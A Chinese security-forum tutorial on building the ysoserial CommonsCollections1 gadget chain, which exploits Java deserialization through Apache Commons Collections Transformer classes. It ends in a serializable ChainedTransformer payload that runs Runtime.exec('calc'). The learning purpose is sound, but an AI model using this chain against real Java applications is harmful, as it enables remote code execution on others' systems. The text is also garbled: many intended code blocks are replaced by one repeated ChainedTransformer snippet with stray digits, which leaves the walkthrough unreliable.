本文为看雪论坛优秀文章
看雪论坛作者ID:wx_牛牛_292
前置知识
// ConstantTransformer构造函数及transform()函数public ConstantTransformer(Object constantToReturn) { super(); iConstant = constantToReturn;} public Object transform(Object input) { return iConstant;}
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}
// InvokerTransformer构造函数及transform()函数public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { super(); iMethodName = methodName; iParamTypes = paramTypes; iArgs = args;} // InvokerTransformer的transform()方法public Object transform(Object input) { if (input == null) { return null; } try { Class cls = input.getClass(); Method method = cls.getMethod(iMethodName, iParamTypes); return method.invoke(input, iArgs); } catch (NoSuchMethodException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist"); } catch (IllegalAccessException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed"); } catch (InvocationTargetException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex); }}
三种方式弹出计算器
// 正常弹计算器Runtime.getRuntime().exec("calc"); // 反射调用计算器// 获取一个Runtime的对象Runtime r = Runtime.getRuntime();// 获取Runtime类Class c = Runtime.class;// 获取Runtime类的exec()方法,(方法名,参数类型)Method execMethod = c.getMethod("exec", String.class);// 反射调用exec弹计算器,(对象,参数)execMethod.invoke(r,"calc"); /*InvokerTransformer调用计算器相当于重新实现了反射,把上面的反射调用后两行写成一行*/Runtime r = Runtime.getRuntime();InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(r);
构造调用链
调用链构造原则:找调用关系要找不同名的方法,如果找到同名,再通过find usages得到的还是一样的结果。最终还是得找不同的方法才能跳转。
哪里调用了transform():checkSetValue()-->transform()
protected Object checkSetValue(Object value) { return valueTransformer.transform(value);}
protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) { super(map); this.keyTransformer = keyTransformer; this.valueTransformer = valueTransformer;}
因此找一下哪里调用TransformedMap()构造函数。
找到decorate()调用了 TransformedMap()。
public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) { return new TransformedMap(map, keyTransformer, valueTransformer);}
// 实例化一个InvokerTransformer (invokerTransformer)InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});// 新建一个map ,传入decorate()中HashMap<Object, Object> map = new HashMap<>();Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);
哪里调用了checkSetValue():setValue()-->checkSetValue()
AbstractInputCheckedMapDecorator类是TransformedMap的父类。
AbstractInputCheckedMapDecorator类的setValue()重写了Map.Entry类中的setValue()。
// 实例化一个InvokerTransformer (invokerTransformer)InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});// 新建一个map ,传入decorate()中HashMap<Object, Object> map = new HashMap<>();Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);for(Map.Entry entry : transforedMap.entrySet()){ entry.setValue(r);}
哪里调用了setValue():readObject()-->setValue()
private void readObject(java.io.ObjectInputStream s) throws java.io.IOException, ClassNotFoundException { s.defaultReadObject(); // Check to make sure that types have not evolved incompatibly AnnotationType annotationType = null; try { annotationType = AnnotationType.getInstance(type); } catch(IllegalArgumentException e) { // Class is no longer an annotation type; time to punch out throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream"); } Map<String, Class<?>> memberTypes = annotationType.memberTypes(); // If there are annotation members without values, that // situation is handled by the invoke method. for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) { String name = memberValue.getKey(); Class<?> memberType = memberTypes.get(name); if (memberType != null) { // i.e. member still exists Object value = memberValue.getValue(); if (!(memberType.isInstance(value) || value instanceof ExceptionProxy)) { memberValue.setValue( new AnnotationTypeMismatchExceptionProxy( value.getClass() + "[" + value + "]").setMember( annotationType.members().get(name))); } } }}AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) { Class<?>[] superInterfaces = type.getInterfaces(); if (!type.isAnnotation() || superInterfaces.length != 1 || superInterfaces[0] != java.lang.annotation.Annotation.class) throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type."); this.type = type; this.memberValues = memberValues;}
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}0
payload1
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}1
目前payload的几个问题:
问题1、setValue()中我们需要传入Runtime的对象r,而AnnotationInvocationHandler类中的setValue()中的参数还无法控制。
问题2、Runtime类没有继承Serializable接口,不能序列化/反序列化。
问题2解决:
Runtime r = Runtime.getRuntime();不能序列化
Class c = Runtime.class;可以序列化
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}2
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}3
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}4
payload2,解决了问题2,还不能执行成功。
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}5
问题3、AnnotationInvocationHandler类中的readObject()中的for循环中有两个if判断需要满足。
问题3解决
1、可能没进入if判断。
2、后面的setValue()括号中的new AnnotationTypeMismatchExceptionProxy()是我们不能控制的。
调试:下断点运行,发现Override.class中是空的,getKey()得到的是null,进不去第一个if判断。
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}6
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}7
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}8
// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}9
1、memberType能不能强转成value
2、value是不是ExceptionProxy类的实例
// InvokerTransformer构造函数及transform()函数public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { super(); iMethodName = methodName; iParamTypes = paramTypes; iArgs = args;} // InvokerTransformer的transform()方法public Object transform(Object input) { if (input == null) { return null; } try { Class cls = input.getClass(); Method method = cls.getMethod(iMethodName, iParamTypes); return method.invoke(input, iArgs); } catch (NoSuchMethodException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist"); } catch (IllegalAccessException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed"); } catch (InvocationTargetException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex); }}0
ConstantTransformer:不管输入是什么,调用transform()方法时,都返回构造函数输入的值。
payload3:
// 此处的Runtime 对象 r 是不能序列化的,需要修改// Runtime r = Runtime.getRuntime();// InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})};ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); HashMap<Object, Object> map = new HashMap<>();// 第一个值要与所选注解中的参数对应,Target中的参数为value,所以第一个参数要改为valuemap.put("value","value");Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, chainedTransformer);/*for(Map.Entry entry : transforedMap.entrySet()){ entry.setValue(r);}*/// 获取类Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");// 获取构造函数Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);// 爆破annotationInvocationHandlerConstructor.setAccessible(true);// 获取实例// ChainedTransformer构造函数及transform()函数public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers;} public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;}8 serialize(o); // 序列化deserialize("ser.bin"); // 反序列化
正向调用顺序:

Java ysoserial学习之CommonsCollections1(二)(https://mp.weixin.qq.com/s?__biz=MzkzODIwMTIwNg==&mid=2247484514&idx=1&sn=2552ec324c1395c9c3c8b9f78cbb4908&chksm=c2829d7bf5f5146d1d2dd0531344262a31b44f27d8c56c7465a9d0555c8773bc096424a0dd53&scene=178&cur_album_id=1898778471904952325#rd)
看雪ID:wx_牛牛_292
https://bbs.pediy.com/user-home-951339.htm

# 往期推荐
1.CVE-2022-21882提权漏洞学习笔记
2.wibu证书 - 初探
3.win10 1909逆向之APIC中断和实验
4.EMET下EAF机制分析以及模拟实现
5.sql注入学习分享
6.V8 Array.prototype.concat函数出现过的issues和他们的POC们


球分享

球点赞

球在看

点击“阅读原文”,了解更多!
还没有评论,来说两句吧...